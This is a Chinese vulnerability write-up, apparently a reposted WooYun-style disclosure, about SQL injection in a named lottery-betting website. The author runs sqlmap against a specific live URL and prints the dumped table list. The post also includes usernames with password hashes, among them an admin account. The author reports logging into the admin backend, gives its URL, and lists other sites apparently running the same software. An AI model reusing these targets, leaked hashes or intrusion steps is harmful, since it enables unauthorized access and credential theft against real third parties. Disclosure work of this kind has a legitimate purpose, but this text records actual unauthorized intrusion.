某体彩系统存在SQL注射漏洞下载

来源:黑吧安全网 浏览:923次 时间:2014-04-29
做网站找雨过天晴工作室

其实我也不知道他们是正规还是不正规的网站,但是使用的人不少就是了。反正我们主要是讲技术,要是被忽略也没关系。

前台检测倒是没有检查出来问题,问题在于支付过后,将出现SQL注入

先完善一下资料,然后得到2元。2元就可以买一注,省了我的钱。正因为这两元引发了这次大规模的检测。

我们来到这个页面

http://www.zhongfuti.com/Trade/Dlt/Project_Info.html?id=103233

然后我用sqlmap。

Database: newzhongfuti

[22 tables]

+------------------+

| KR_About |

| KR_Admin |

| KR_Announce |

| KR_Bank_Back |

| KR_Buy |

| KR_Config |

| KR_Follow |

| KR_Link |

| KR_Login |

| KR_Lottery_Code |

| KR_Lottery_Foot |

| KR_Lottery_Info |

| KR_Lottery_Issue |

| KR_Lottery_Win |

| KR_NewsClass |

| KR_NewsClass |

| KR_Notes |

| KR_PayBank |

| KR_PaymentPlat |

| KR_Point |

| KR_User |

| dtproperties |

+------------------+

好的,搞一下密码吧。

| huchaoyang | DD90B9A4DFF00B364C4E25FFC1AF3AA8 |

| xyc | E10ADC3949BA59ABBE56E057F20F883E |

| admin | E244F1E36FDC36803319D329FAADD3B6 |

漏洞证明:

我们登录一下后台,后台你是扫不到的。我是意外得到的



http://www.zhongfuti.com/admin708/index.html

后台可以发现,提供商叫行知网络

同样,发现这样的caipiao网站不少,不下百个.关键词不给出了,反正合不合法我不知道啦,正规的有,不正规的也有。例如:

http://bssags.com/ 梵客caipiao网

http://www.futizaixian.com 福体在线 后台也是那个。

都是一样的小星星啊。



不敢深入了,你们不要打我啊,给我中一个200块啊,买这么多次了都没有中奖。厂商要是没有给rank的话,wooyun适当看看呗。



PS.厂商真不知道是不是这个,管理顺便帮忙找一下哦。我要上班了哇。

 

修复方案:

1.过滤

2.修改默认后台路劲